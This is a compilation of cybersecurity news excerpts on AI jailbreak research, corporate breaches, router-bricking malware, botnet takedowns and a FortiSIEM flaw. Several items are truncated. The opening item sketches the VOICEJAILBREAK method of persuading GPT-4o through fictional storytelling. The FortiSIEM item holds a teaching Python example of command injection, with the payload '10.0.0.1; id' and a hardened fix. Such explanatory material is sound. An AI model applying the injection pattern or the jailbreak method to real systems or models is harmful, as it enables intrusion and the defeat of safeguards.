The news comes as research on AI jailbreaking and attack techniques has grown, with a number of recent reports on risks and possible solutions. In a paper posted to arXiv this week, researchers at CISPA said they were able to more than double their attack success rate (ASR) on GPT-4o’s voice mode with an attack they dubbed VOICEJAILBREAK, “a novel voice jailbreak attack that humanizes GPT-4o and attempts to persuade it through fictional storytelling (setting, character, and plot).” Another arXiv paper, posted in February by researchers at the University of California at Berkeley, looked at a range of risks associated with GenAI tools such as Microsoft Copilot and ChatGPT, along with possible solutions, such as development of an “AI firewall” to monitor and, if necessary, modify LLM inputs and outputs. And earlier this month, OT and IoT security company SCADAfence outlined a wide range of AI tools, threat actors and attack techniques. In addition to general-purpose chatbots like ChatGPT and Google Gemini, the report looked at “dark LLMs” created for malicious purposes, such as WormGPT, FraudGPT, DarkBERT and DarkBART. SCADAfence recommended that OT and SCADA organizations follow best practices such as limiting network exposure for control systems, patching, access control and up-to-date offline backups. GenAI uses and misuses are also expected to be the topic of a number of presentations at Gartner’s Security and Risk Management Summit next week in National Harbor, Maryland, just outside the U.S. capital.
Toshiba America Data Breach: Customers and State Authorities Notified
Toshiba America Data Breach
After conducting a preliminary investigation, Toshiba reported that an attacker may have compromised its email environment. The attacker may have obtained unauthorized access to sensitive personally identifiable information such as names and Social Security numbers from the email compromise. The investigation confirmed that the breach could have impacted numerous individuals, leading Toshiba to contact affected individuals, as legally required. Toshiba America Business Solutions advised customers to remain cautious over the incident. The firm advised customers to regularly review their credit reports, financial account statements, and payment card statements for any unauthorized activity. Any suspicious activity could be reported to Toshiba or law enforcement agencies. Toshiba apologized to the affected individuals for any inconvenience stemming from the incident and said that additional measures had been implemented since then to enhance the security of its email environment and prevent similar occurrences in the future. To assist the affected individuals in safeguarding their personal information, Toshiba has arranged for a complimentary, two-year membership of identity monitoring services offered through Kroll. This membership offering includes triple bureau credit monitoring, fraud consultation, and identity theft restoration. The fraud consultation option allows affected individuals to reach out to Kroll fraud specialists for advice and assistance relating to identity protection, legal rights, and detection of suspicious activity. The identity theft restoration option lets affected individuals work with a licensed Kroll investigator to resolve potential identity theft issues. Toshiba stated that these services would be provided for free to the affected individuals and would not negatively impact their credit scores. 
Affected individuals were encouraged to use the services as well as to contact Toshiba or Kroll for additional assistance.
Law Firm Announces Investigation
Strauss Borrelli PLLC, a data breach law firm, announced on its website that it would be investigating Toshiba American Business Solutions, Inc. with regard to the recent data breach that exposed sensitive personally identifiable information. While the full extent of the data breach is unknown, the Toshiba America Business Solutions division operates offices across the U.S. and Latin America. The law firm encouraged customers who received a breach notification letter from Toshiba American Business Solutions to contact Strauss Borrelli PLLC to discuss their rights and potential legal remedies in response to the incident. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Malicious Firmware Update Destroyed Over 600,000 Routers Across ISP
'Pumpkin Eclipse' Router Attack
The attack began on October 25, 2023, as the ISP's subscribers began reporting that their ActionTec T3200 and Sagemcom routers had suddenly stopped working. Users described the devices as unresponsive, with a steady red light on the front panel. Many blamed the ISP for the mass "bricking" of the routers, alleging the company had pushed faulty firmware updates. However, according to new research by Black Lotus Labs, the incident was in fact the result of a deliberate, malicious act. The researchers reported that over a 72-hour period, malware known as "Chalubo" had infected over 600,000 routers connected to a single autonomous system number (ASN) belonging to an unnamed ISP. While the researchers avoided naming the ISP affected, the description of the attack matches frustrations expressed months ago by subscribers of the Windstream ISP, including the router models affected and their resulting behavior. The Chalubo malware, a commodity remote access trojan (RAT) first identified in 2018, employed sophisticated tactics to cover its tracks. It removed all files from the infected devices' disks, ran entirely in memory, and assumed random process names already present on the routers. The researchers believe the malware downloaded and ran code that overwrote the routers' firmware, rendering them permanently inoperable. The researchers state that while the motives behind the attack are unknown, its implications are troubling.
Researchers Unsure Over Initial Attack Vector but Theorize Possibilities
Although the researchers identified the malware's multi-stage attack process and its spread across the ISP's network, they have been unable to determine the initial infection vector employed by the threat actor. They theorize that it could have resulted from the exploitation of a vulnerability in the devices, the abuse of weak credentials, or the compromise of the routers' administrative panels. The researchers said the attack is highly concerning, as it sets a new precedent for malware capable of mass-bricking consumer networking devices. The researchers could only recall one prior similar event: the 2022 discovery of the AcidRain malware, which knocked out over 10,000 satellite internet modems in Ukraine and Europe at the start of the Russian invasion. The researchers said the impact of the "Pumpkin Eclipse" attack was particularly severe, as the affected ISP's service area covers many rural and underserved communities. Residents may have lost access to emergency services, farmers could have been cut off from remote crop monitoring, and healthcare providers may have been unable to access patient records or provide telehealth services. "At this time, we do not assess this to be the work of a nation-state or state-sponsored entity," the Lumen researchers wrote. "In fact, we have not observed any overlap with known destructive activity clusters; particularly those prone to destructive events such as Volt Typhoon, or SeaShell Blizzard." Nonetheless, they speculated that the use of a commodity malware family may have been a deliberate move to obscure the perpetrator's identity. Recovery from such a supply chain disruption is always more challenging in isolated or vulnerable regions, the researchers added. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it.
The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Internet Archive Defends Against Cyberattack Amid DDoS Assault
Internet Archive Cyberattack Targets Multiple Systems
According to a blog post shared by Internet Archive on May 28, intermittent service disruptions have been reported over the past few days, confirmed by updates shared by Archive officials on social media platforms. Despite efforts to mitigate the attack, the exact source remains undisclosed. In response to the DDoS attack, Brewster Kahle, the founder and digital librarian of the Internet Archive, expressed gratitude for the outpouring of support while reaffirming the organization's commitment to fortify its defenses. Kahle characterized the attack as "sustained, impactful, targeted, adaptive, and importantly, mean" in the blog post.
Mitigation Against the Internet Archive DDoS Attack
The Internet Archive serves as a valuable resource for users seeking access to a diverse range of media content, both historical and contemporary, free of charge. However, its mission to democratize access to knowledge has encountered legal challenges, with the organization facing lawsuits from the U.S. book publishing and recording industry associations in the last year. The legal actions alleged copyright infringement and sought significant damages, casting a shadow over the future operations of libraries worldwide. The cyberattack on the Internet Archive echoes a troubling trend of attacks targeting libraries and knowledge institutions globally. Recent victims include the British Library, the Solano County Public Library in California, the Berlin Natural History Museum, Ontario’s London Public Library, and just this week, the Seattle Public Library. In light of the ongoing cyberattack and legal battles, Kahle emphasized the broader implications for libraries everywhere. He warned that the actions of publishing and recording industries threaten to undermine the very existence of libraries, posing a grave concern for patrons worldwide. This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the Internet Archive cyberattack or any further communication from the organization. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Johnson & Johnson Reports Data Breach Potentially Linked to Massive Cencora Breach
Johnson & Johnson Data Breach Notice
On May 29, Johnson & Johnson filed a notice of data breach with the Attorney General of Texas, indicating that an unauthorized party accessed confidential patient information. The breach affected approximately 175,000 Texans, but the total number of victims nationwide could be much higher. The breach affects two Johnson & Johnson entities: Johnson & Johnson Patient Assistance Foundation, Inc., and Johnson & Johnson Services, Inc. The following data was compromised in the attack: name of individual, address, medical information, and date of birth. Data breach notification letters have been sent to all the affected individuals, while limited information is available on the Texas Attorney General's data breach reports page. The incident is potentially linked to a much larger breach involving Cencora, which has affected over a dozen major pharmaceutical companies so far.
Link to Cencora Data Breach
The Johnson & Johnson data breach bears several similarities to other large third-party pharmaceutical company data breaches stemming from the Cencora/Lash Group data breach, which was first discovered on February 21. Cencora’s Lash Group division aids pharmaceutical companies in running patient support programs that try to ensure that costly medication is available to disadvantaged patients, regardless of their ability to pay for it. At least 15 clients of Cencora/Lash Group have notified state authorities of data breach incidents, with databreaches.net listing the following victims:
- AbbVie: 54,344 Texans affected
- Acadia Pharmaceuticals: 753 Texans affected
- Bayer: 8,822 Texans affected
- Bristol Myers Squibb and/or the Bristol Myers Squibb Patient Assistance Foundation: 256,237 Texans and 11,503 New Hampshire residents affected
- Dendreon: 2,923 Texans affected
- Endo: no numbers provided
- Genentech: 5,805 Texans affected
- GlaxoSmithKline Group of Companies and/or the GlaxoSmithKline Patient Access Programs Foundation: no numbers provided
- Incyte Corporation: 2,592 Texans affected
- Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.: 466 Texans and 27 New Hampshire residents affected
- Novartis Pharmaceuticals: 12,134 Texans affected
- Pharming Healthcare, Inc.: 314 Texans and 9 New Hampshire residents affected
- Regeneron Pharmaceuticals: 91,514 Texans affected
- Sumitomo Pharma America, Inc.: 24,102 Texans affected
- Tolmar: 1 New Hampshire resident
The notification letters state: “There is no evidence that any of this information has been or will be publicly disclosed, or that any information was or will be misused for fraudulent purposes as a result of this incident, but we are communicating this so that affected individuals can take the steps outlined below to protect yourself.” The Lash Group is offering free credit monitoring and remediation services to affected individuals, and additional guidance on dealing with suspected breaches of personal information. No perpetrator has been identified or named as being responsible for the attack, and the potential impact of the breach is still being assessed. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Deuterbear RAT: China-Linked Hackers’ Cyber Espionage Tool
Media reports claim that cybersecurity experts have recently unveiled new details about a remote access trojan (RAT) named Deuterbear, employed by the China-linked hacking group BlackTech. This sophisticated Deuterbear RAT malware is part of a broader cyber espionage operation targeting the Asia-Pacific region throughout the year.
Advancements Over Waterbear
Deuterbear exhibits notable advancements over […]
Fortinet FortiSIEM Vulnerabilities Expose Systems to Remote Code Execution
Understanding the Fortinet FortiSIEM Vulnerability
The severity of the Fortinet FortiSIEM vulnerability varies based on the privileges associated with the compromised service account, with administrative accounts posing the highest risk. According to SingCERT, proof-of-concept exploits are already available for CVE-2024-23108 and CVE-2023-34992, indicating an immediate threat to vulnerable systems. Fortinet FortiSIEM versions 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.2 are all affected by the vulnerabilities. The risks associated with these vulnerabilities vary across different sectors, with large and medium government entities and businesses facing high risks, while small government entities and businesses face a medium level of risk. Home users, however, are considered to have a low-risk exposure.
Technical Analysis of FortiSIEM Vulnerability
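The two CVEs above are OS command injection flaws (CWE-78) in the FortiSIEM supervisor, reachable through crafted API requests. What follows is an added illustration of that bug class, not Fortinet's code or the actual vulnerable code path: a handler that splices an untrusted `host` parameter into a shell command, beside a version that validates the value and passes it as a single argv element with no shell. The handler, its `host` parameter and the ping command are assumptions made for the example.

```python
"""OS command injection (CWE-78): a vulnerable API handler beside a hardened one.

Added example, not Fortinet code. The article says only that the FortiSIEM
supervisor failed to neutralize special elements in OS commands reachable via
crafted API requests, so this is a generic illustration of that bug class.
The 'host' parameter, the ping command and the handler itself are assumptions.
"""
import ipaddress
import re
import subprocess

PING = "/usr/bin/ping"
# Hostname allow-list: letters, digits, dots and hyphens, and never a leading
# '-' so the value cannot be parsed as an option (argument injection).
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def build_command_vulnerable(host: str) -> str:
    """Untrusted input spliced into a shell string. Run with shell=True, the
    shell interprets ';', '|', '&&', '$(...)', so 'host' decides what runs."""
    return f"{PING} -c 1 {host}"


def shell_view(cmd: str) -> list:
    """Crude picture of what /bin/sh would see: split on ';' only. Real shells
    also honour '|', '&&', backticks and $(...)."""
    return [part.strip() for part in cmd.split(";") if part.strip()]


def validate_host(host: str) -> str:
    """Accept a literal IPv4/IPv6 address or a plain DNS-style hostname;
    reject everything else before it reaches any command."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOST_RE.fullmatch(host) and ".." not in host:
        return host
    raise ValueError(f"rejected host parameter: {host!r}")


def is_rejected(host: str) -> bool:
    """True if validate_host() refuses the value."""
    try:
        validate_host(host)
        return False
    except ValueError:
        return True


def build_command_hardened(host: str) -> list:
    """Validate, then build an argv list. No shell is involved, so there is
    no metacharacter parsing: the host is exactly one argument."""
    return [PING, "-c", "1", validate_host(host)]


def ping_host(host: str, execute: bool = False):
    """The handler as it would sit behind an API route. Returns the argv by
    default; with execute=True runs it without a shell and returns the
    exit code."""
    argv = build_command_hardened(host)
    if not execute:
        return argv
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).returncode


if __name__ == "__main__":
    payload = "10.0.0.1; id"
    print("vulnerable string :", build_command_vulnerable(payload))
    print("shell would run   :", shell_view(build_command_vulnerable(payload)))
    print("hardened argv     :", ping_host("10.0.0.1"))
    print("payload rejected  :", is_rejected(payload))
```

The fix is the combination, not either half alone: an allow-list on the parameter, and an argv list executed without a shell. Dropping `shell=True` on its own still leaves argument injection (a value starting with `-`), which is why the hostname pattern forbids a leading hyphen.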
Technical analysis of these FortiSIEM vulnerabilities maps them to the MITRE ATT&CK Execution tactic, specifically the Command and Scripting Interpreter technique. Multiple instances of improper neutralization of special elements used in an OS command (command injection) have been identified in the FortiSIEM supervisor, and they can be exploited by remote, unauthenticated attackers via specially crafted API requests. To mitigate the risk, it is recommended to promptly apply the patches provided by Fortinet after thorough testing. Other recommended measures include:
- establishing and maintaining a documented vulnerability management process for enterprise assets;
- performing regular automated application updates;
- enforcing network-based URL filters to limit access to potentially malicious websites;
- applying the principle of least privilege to privileged account management;
- blocking unauthorized code execution through application control and script blocking;
- establishing and maintaining a secure configuration process for enterprise assets and software; and
- addressing penetration test findings according to the enterprise's remediation policy.
By adhering to these recommendations, organizations can mitigate the vulnerabilities in Fortinet FortiSIEM and reduce their exposure to remote code execution. Stakeholders must prioritize these actions to ensure the security and integrity of their IT infrastructure. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Operation Endgame – Largest Ever Operation Against Multiple Botnets Used to Deliver Ransomware
“This is the largest ever operation against botnets, which play a major role in the deployment of ransomware,” Europol said. Botnets are used for different types of cybercrime including ransomware, identity theft, credit card scams, and several other financial crimes. “The dismantled botnets consisted of millions of infected computer systems,” a joint press statement from the Operation Endgame team said. Led by France, Germany, and the Netherlands, and supported by Eurojust, the operation involved countries including Denmark, the United Kingdom, the United States, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland, and Ukraine. Operation Endgame resulted in:
- 4 arrests - 1 in Armenia and 3 in Ukraine.
- 16 location searches - 1 in Armenia, 1 in the Netherlands, 3 in Portugal, and 11 in Ukraine.
- Over 100 servers dismantled or disrupted in countries such as Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the UK, the US, and Ukraine.
- Over 2,000 domains seized and brought under law enforcement control.
- 8 summons were also served against other suspects.
Targeting the Cybercrime Infrastructure
Operation Endgame focused on high-value targets, their criminal infrastructure behind various malware and the freezing of illicit proceeds. “The malware, whose infrastructure was taken down during the action days, facilitated attacks with ransomware and other malicious software,” according to Europol. One primary suspect, the Europol said, earned at least €69 million in cryptocurrency by renting out sites for ransomware deployment. Authorities are closely monitoring these transactions and have secured permissions to seize the assets. The infrastructure and financial seizures had a global impact on the dropper ecosystem, the authorities believe.Key Dropper Malware Dismantled in Operation Endgame
- SystemBC: Facilitated anonymous communication between infected systems and command-and-control servers.
- Bumblebee: Delivered via phishing campaigns or compromised websites, enabling further payload execution.
- Smokeloader: Used primarily to download and install additional malicious software.
- IcedID (BokBot): Evolved from a banking trojan to a multi-purpose tool for various cybercrimes.
- Pikabot: Enabled ransomware deployment, remote takeovers, and data theft through initial system access.
“All of them are now being used to deploy ransomware and are seen as the main threat in the infection chain,” Europol said. [Figure: Operation Endgame seizure notice (Credit: Europol)]
The Role of Dropper Malware in Cyberattacks
Droppers are essential tools in cyberattacks, acting as the initial vector to bypass security controls and install harmful software such as ransomware and spyware. They enable further malicious activity by deploying additional malware on compromised systems.
How Droppers Operate
- Infiltration: Enter systems through email attachments, compromised websites, or bundled with legitimate software.
- Execution: Install additional malware on the victim's computer without the user's knowledge.
- Evasion: Avoid detection by security software through methods like code obfuscation and running in memory.
- Payload Delivery: Deploy additional malware, potentially becoming inactive or removing itself to evade detection.
Wait for Operation Endgame Season 2
Operation Endgame signifies a major victory, but it is not the end of the story. Taking a cue from the Marvel film ‘Avengers: Endgame,’ law enforcement says it is set to release part two of the operation in a few hours, as its efforts continue. “This is Season 1 of operation Endgame. Stay tuned. It sure will be exciting. Maybe not for everyone though. Some results can be found here, others will come to you in different and unexpected ways,” the authorities said. “Feel free to get in touch, you might need us. Surely, we could both benefit from an openhearted dialogue. You would not be the first one, nor will you be the last. Think about (y)our next move.” Future actions will be announced on the Operation Endgame website, possibly targeting suspects and users, and ensuring accountability. The news of this massive botnet takedown comes a day after the announcement of the dismantling of “likely the world’s largest botnet ever,” the 911 S5 botnet. The botnet’s alleged administrator, Yunhe Wang, was arrested last week, and a subsequent seizure of infrastructure and assets was announced by the FBI. The recent law enforcement actions represent a historic milestone in combating cybercrime, dealing a significant blow to the dropper malware ecosystem that supports ransomware and other malicious activities. The operation's success underscores the importance of international cooperation and the need for robust cybersecurity measures to tackle evolving threats.
BBC Data Breach: Over 25,000 Employee Records Compromised, Investigation Underway
BBC Data Breach Impacts Current and Former Employees
According to Birmingham Live, the security incident is being taken "extremely seriously” by the BBC and there is “no evidence of a ransomware attack.” Despite speculation of a possible ransomware attack, the British public service broadcaster has dispelled any conjecture, asserting that there is currently no evidence supporting this theory. The BBC clarified that the breach stemmed from private records being illicitly accessed from an online data storage service. Catherine Claydon, Chair of the BBC Pension Trust, assured employees that swift action had been taken to address the breach and secure the affected data source, The Guardian reported. In an email sent to staff, Claydon reassured employees that the “BBC have taken immediate steps to assess and contain the incident.” Describing the mitigation strategy, the organization stated: “We are working at pace with specialist teams internally and externally to understand how this happened and take appropriate action. As a precaution, we have also put in place additional security measures and continue to monitor the situation.” The legal obligations arising from this data breach are far-reaching, and in cases where the incident impacts individual rights and freedoms, "this comes with a regulatory obligation to notify the Information Commissioner, and where people are at 'high risk' the affected organisation must notify those individuals too without undue delay", said Lauren.
BBC Employee Data Breach and Ongoing Investigation
Despite assurances from the BBC, concerns linger over potential misuse of the compromised information. Employees have been advised to remain vigilant and report any suspicious activity promptly. Although the breach is attributed to a third-party cloud storage provider, it still threatens the security of the affected individuals, and the “BBC - and any ‘data controller’ under data protection laws - remains primarily responsible for the security measures it adopts and external providers it engages to store and protect its personal data,” added Lauren. No passwords or bank details “appear to have been compromised, but the advice for those individuals involved is to be vigilant of any unusual activity or requests.” Acknowledging the severity of the breach, a spokesperson for the BBC pension scheme apologized to affected members and reiterated the swift response and containment of the breach, along with ongoing efforts to upgrade security measures and monitor the situation closely. Inquiries into the incident are ongoing, with external cybersecurity experts working alongside internal teams to examine the breach and its implications. As of now, no official statement has been issued regarding the involvement of ransomware groups. This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the BBC employee data breach or any official response from the organization.
911 S5 Botnet — Likely the World’s Largest Botnet Ever, Dismantled
“Working with our international partners, the FBI conducted a joint, sequenced cyber operation to dismantle the 911 S5 Botnet—likely the world’s largest botnet ever,” said FBI Director Christopher Wray. “We arrested its administrator, Yunhe Wang, seized infrastructure and assets, and levied sanctions against Wang and his co-conspirators,” Wray added. Wang and two of his associates, along with three Thailand-based businesses linked to the botnet, were sanctioned by the U.S. Treasury Department on Tuesday. Wang faces up to 65 years in prison on charges that include computer fraud, wire fraud, and money laundering.
911 S5 Botnet Operations
Beginning in 2014, Wang allegedly developed and distributed malware that compromised millions of Windows computers worldwide, including over 600,000 IP addresses in the U.S. Wang allegedly spread the malware through malicious VPN programs like MaskVPN and DewVPN, as well as through pirated software bundled with malware. Wang managed and controlled approximately 150 dedicated servers worldwide. “Using the dedicated servers, Wang was able to deploy and manage applications, command and control the infected devices, operate his 911 S5 service and provide to paying customers access to the proxied IP addresses associated with the infected devices,” Wang's indictment said. The residential proxy service that Wang developed and operated allowed subscribers to access more than 19 million compromised IP addresses, which helped them mask their online activities. The service generated approximately $99 million for Wang. The 911 S5 botnet facilitated a range of cybercrimes, including cyberattacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations, Garland said. In one example, customers used the botnet to fraudulently file 560,000 unemployment insurance claims, resulting in a confirmed loss of $5.9 billion from federal pandemic relief programs. In another, 911 S5 customers used the service to file more than 47,000 Economic Injury Disaster Loan applications, again resulting in losses of millions of dollars.
Infrastructure and Assets Seized
Authorities seized 23 internet domains and more than 70 servers, which formed the core of the 911 S5 botnet and its successor services. This action effectively shut down the botnet and prevented Wang from reconstituting the service under a new name, CloudRouter. The U.S. Department of Justice emphasized that the seizure closed existing malicious backdoors used by the botnet. Wang allegedly used the proceeds from the botnet to purchase properties across the globe, including in the U.S., China, Singapore, Thailand, the United Arab Emirates, and St. Kitts and Nevis, where he also holds citizenship. Authorities have moved to forfeit his assets, which include 21 properties and a collection of luxury cars such as a Ferrari F8, several BMWs, and a Rolls-Royce.
Investigation Triggered by Ecommerce Incident
The investigation into the 911 S5 botnet was initiated following a probe into more than 2,000 fraudulent orders placed with stolen credit cards on ShopMyExchange, an e-commerce platform linked to the Army and Air Force Exchange Service. The perpetrators, in Ghana and the U.S., were found to be using IP addresses acquired from 911 S5. “Although approximately 2,525 fraudulent orders valued at $5.5 million were submitted, credit card fraud detection systems and federal investigators were able to thwart the bulk of the attempted purchases, reducing the actual loss to approximately $254,000,” the Justice Department said. The latest takedown is part of a broader Justice Department effort to combat nation-state hacking and international cybercrime. At the beginning of the year, the Justice Department dismantled a botnet linked to the China-affiliated hacking group Volt Typhoon, followed by the disruption of a botnet controlled by APT28, the group associated with Russian military intelligence, the GRU. Google-owned cybersecurity firm Mandiant also warned last week that Chinese state hackers are increasingly using vast proxy server networks, built from compromised online devices and virtual private servers, to evade detection during their cyberespionage campaigns. Garland highlighted the global collaboration in this operation, underscoring the Justice Department's commitment to disrupting cybercrime networks that pose a significant threat to individuals and national security.
Windows Defender Bypass Tool Shared on GitHub
Windows Defender Bypass Requires Admin Privileges
EDR (endpoint detection and response) and antivirus bypasses aren’t uncommon, as hackers and researchers alike have found ways to disable security defenses. Security researchers and testers often turn off defenses in the course of their work, so such tools have legitimate uses too. As one commenter noted on Hacker News, "Defender is a real irritant when doing security research and is near impossible to turn off completely and permanently. Even using the Group Policy Editor or regedits is not reliable. If you do get it to stop, it will randomly reenable itself weeks later...For the vast majority of people this is a good thing!" Dormann noted that elevated admin privileges are all that’s required to run the No Defender tool, so Windows users have yet another reason not to run Windows as an admin. “If you don't log in to Windows as an admin, as we security-conscious people do, then you won't have as much to worry about,” Dormann wrote. One Mastodon commenter, who goes by the handle “faebudo,” saw the GitHub tool as an Avast flaw rather than Microsoft’s, noting that “it requires an executable signed with Authenticode SigningLevel 7 ("Signed by an Antimalware vendor whose product is using AMPPL").” “I see this more as a vulnerability of the Avast wsc_proxy.exe component misused here that allows untrusted/unsigned code to interact with it,” the commenter said. The Cyber Express reached out to Microsoft and Avast for comment and will update this article with any response. But Dormann told The Cyber Express the issue is "more of a novelty than a vulnerability per se. Admin-privileged users can do admin things. Which includes reconfiguring the system they're on. Including kernel-level access."
BreachForums Breached? Forum’s Return Sparks Fear Among Cybercriminals
BreachForums Seizure and Return
BreachForums, widely recognized as the successor to RaidForums, has faced several downtimes, seizures and disruptions in its eventful history. The original owner, Conor Brian Fitzpatrick, AKA "Pompompurin," was arrested last year on cybercrime and device fraud charges. BreachForums administrator "Baphomet" announced that he would step in as successor and opened a new domain to resume forum activity. However, Baphomet himself feared site compromise by law enforcement and temporarily shut down the forum, stating that "nothing is safe anymore." (Image source: Cyble) Baphomet later announced that he would be working on a new domain and resuming forum operations, and the forum soon returned to the regular sharing and discussion of data leaks. A year later, Baphomet himself was arrested in a joint law enforcement operation, which also seized the BreachForums domain and official Telegram channel. The administrator ShinyHunters emerged as the successor, confirming Baphomet's arrest. However, the domain seizure was short-lived, and the domain was soon redirecting users to a new Telegram channel. An allegedly leaked conversation between an FBI operative and BreachForums' previous domain registrar and hosting provider, NiceNic, also appeared to indicate that ShinyHunters had regained control of the domain despite its court-ordered seizure. (Image source: Telegram) After a period of dysfunction, BreachForums has now resumed operations, with threat actors already claiming new victims in forum postings.
Emerging Alternatives and Criminal Suspicion Over BreachForums
In the wake of the recent seizure, several other individuals expressed doubts about BreachForums and its possible use as a "honeypot" by law enforcement to entrap cybercriminals and disrupt operations. The owner of SecretForums and former owner of BlackForums said over Telegram that he believed Baphomet was possibly a law enforcement informant, citing the latter's interest in maintaining BlackForums' infrastructure. Prominent threat actor USDoD also cast doubt on ShinyHunters' succession as BreachForums administrator, citing the account's low stats on the previous domain. These concerns were followed by self-promotion of SecretForums and of USDoD's announced project "Breach Nation" as possible alternatives. More recently, the CyberNi***rs threat actor group also announced its intention to start a new site to coordinate its operations. Despite these activities and the surrounding suspicion, new owner ShinyHunters seems eager to return to earlier activities, judging by the group's claim of responsibility for an attack on Live Nation Entertainment Inc., the parent company of Ticketmaster. The outcome of these events, their effect on the cybercriminal ecosystem, and the viability of emerging forums as alternatives to the relaunched BreachForums remain unclear. But given how vocal the participants are, the picture will almost certainly get clearer with time.
U.S. Treasury Sanctions Chinese Nationals Behind Billion-Dollar 911 S5 Botnet Fraud
The Rise and Demise of 911 S5 Botnet
The botnet in question played a critical role in executing numerous fraudulent schemes through stolen residential IP addresses. “The 911 S5 botnet compromised approximately 19 million IP addresses and facilitated the submission of tens of thousands of fraudulent applications related to the Coronavirus Aid, Relief, and Economic Security Act programs by its users, resulting in the loss of billions of dollars to the U.S. government.” 911 S5 is a residential proxy botnet that allows its paying users, often cybercriminals, to select the IP addresses they use to connect to the internet, routing their traffic through intermediary, internet-connected computers that have been compromised without their owners’ knowledge. 911 S5 thus lets cybercriminals conceal their originating location, effectively defeating fraud detection systems, the U.S. Treasury explained. The botnet was also implicated in a series of bomb threats made in July 2022, according to the Treasury, with investigators tracing IP addresses used in that incident to the proxy network. The 911 S5 service went offline in July 2022, following a purported hacking incident that damaged essential data, as reported by independent journalist Brian Krebs. Despite the shutdown, the impact of its earlier operations continued to reverberate, leading to the current sanctions.
The Individuals and Businesses Sanctioned
The sanctioned individuals include Yunhe Wang, allegedly the administrator of the botnet; Jingping Liu, accused of laundering proceeds for Wang; and Yanni Zheng, who reportedly acted as Wang's power of attorney and facilitated business transactions on his behalf through the company Spicy Code Company Limited. The men are believed to reside in Singapore and Thailand, countries that were acknowledged as partners in the sanctions announcement. Three businesses registered in Thailand were also sanctioned for their connections to Wang. The sanctions require that any property and interests owned by the three men within the U.S. be reported to the Treasury, and prohibit U.S. citizens and residents from doing business with them. At the time of the Treasury announcement, only these three individuals and the implicated businesses were sanctioned; the U.S. Department of Justice (DOJ) had not revealed any indictments or other legal action, as is the case in many such instances.
Broader Ongoing Cybersecurity Concerns
The sanctions against these individuals are part of a broader U.S. government effort to address cybersecurity threats, including those linked to state-sponsored hacking groups. Google-owned cybersecurity firm Mandiant warned last week that Chinese state hackers are increasingly using vast proxy server networks, built from compromised online devices and virtual private servers, to evade detection during their cyberespionage campaigns. In January, the DOJ announced the takedown of a botnet associated with Volt Typhoon, a hacking group with ties to the Chinese government, which infected home and office routers with malware to obscure its hacking activities. The concerted actions by U.S. authorities and private defenders highlight the ongoing challenges in combating cybercrime and protecting critical financial and infrastructure systems from sophisticated malicious actors.
A Quest Gone Awry: Hackers Disrupt Bring Me The Horizon’s Hidden M8 Artificial Reality Game
Bring Me The Horizon Hidden M8 Artificial Reality Game
Bring Me the Horizon, a British rock band formed in Sheffield in 2004, is celebrated for embedding hidden meanings, easter eggs, and clues in its music. With the release of its latest album, 'POST HUMAN: NeX GEn,' the band has deepened this practice, layering even more secrets into its songs. In one of the album's music videos, a character named 'M8' appears and begins to greet the viewer but is abruptly stopped by a 'fatal-error'. M8 then directs the viewer to find the 'serial number' located on the side of its head. A curious listener appears to have analyzed the audio of that segment and discovered a hidden spectrogram containing a QR code, sharing an image of it on the band's subreddit. Fans then found that the QR code led to a hidden, hacking-themed website hosting the M8 Artificial Reality Game. (Image source: /r/BringMeTheHorizon subreddit) The site prompted users to enter a hidden serial code, which fans pieced together from several other clues. It contained unreleased tracks, password-protected files, and various mysteries for fans to uncover. (Image source: multidimensionalnavigator8.help) As news of the hidden website spread, fans quickly set up a dedicated Discord server and collaborated via a Google Doc to unearth all the site’s secrets. Their excitement was brief, however: some users soon tried to extract further secrets from the website using unconventional methods, leading the developers to temporarily shut down the site and issue a warning to fans.
Warnings Over Hacking Attempts
After the hacking attempts, cautionary messages from M8, the album's virtual guide, expressed dismay at the intrusion, stressing how such actions undermined the spirit of collective exploration. The messages were delivered both through the website, which was temporarily replaced with the warning for two hours, and through email. (Image source: archive.org) (Image source: BringMeTheHorizon ARG Discord) The developers appeared to condemn the attempts indirectly through the M8 character, without specifying the nature of the intrusion or identifying the perpetrators. Some fans, however, found the warning email unexpected after what they believed were legitimate interactions. The community felt that a select few had ruined the experience for others, and its Discord server noted the downtime in its FAQ. Bring Me The Horizon's foray into alternate reality gaming showcases the creative potential of digital media in music and album promotion. As fans continue to work together to unravel the remaining mysteries and solve the puzzles within the ARG, it remains to be seen what other surprises await them on the hidden website. The hacking attempts and the subsequent warnings serve as a reminder that while ARGs can be an engaging and immersive experience, it is essential to respect the developers' intentions and play fair so everyone can enjoy the journey together.
North Korean Threat Actor Deploying New FakePenny Ransomware: Microsoft
